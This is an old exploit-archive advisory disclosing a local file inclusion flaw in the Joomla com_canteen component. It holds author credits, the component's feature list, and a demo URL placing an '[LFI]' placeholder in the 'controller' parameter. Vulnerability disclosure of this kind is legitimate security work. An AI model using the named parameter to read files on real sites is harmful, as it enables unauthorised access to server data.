Joomla com_canteen LFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla com_canteen LFI Vulnerability
# Published : 2010-07-09
# Author : Sid3^effects
# Previous Title : Minify4Joomla Upload and Persistent XSS Vulnerability
# Next Title : IXXO Cart for Joomla SQLi Vulnerability

Name :   Joomla com_canteen LFI Vulnerability
Date : july 9,2010
vendor URL :http://miniwork.eu/
Author : Sid3^effects aKa HaRi 
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description 
This component is written for canteens. You can easily manage daily menu with this component.

Features:

+ possible to create groups of meals (e.g. Breakfast, Lunch, Dinner)
+ possible to create subgroups of meals (e.g. soup, desert)
+ enable/disable showing prices
+ enable/disable ordering for groups or subgroups
+ manage sort order of groups, subgroups
+ manage users (customers)
+ manage daily meal
+ manage user's orders
+ import meal by xml file
+ bursa users can order meal from bursa
+ statistics
#######################################################################################################
Xploit: LFI Vulnerability


Demo url : http://server/path/index.php?option=com_canteen&controller=[LFI]

#######################################################################################################
# 0day no more 
# Sid3^effects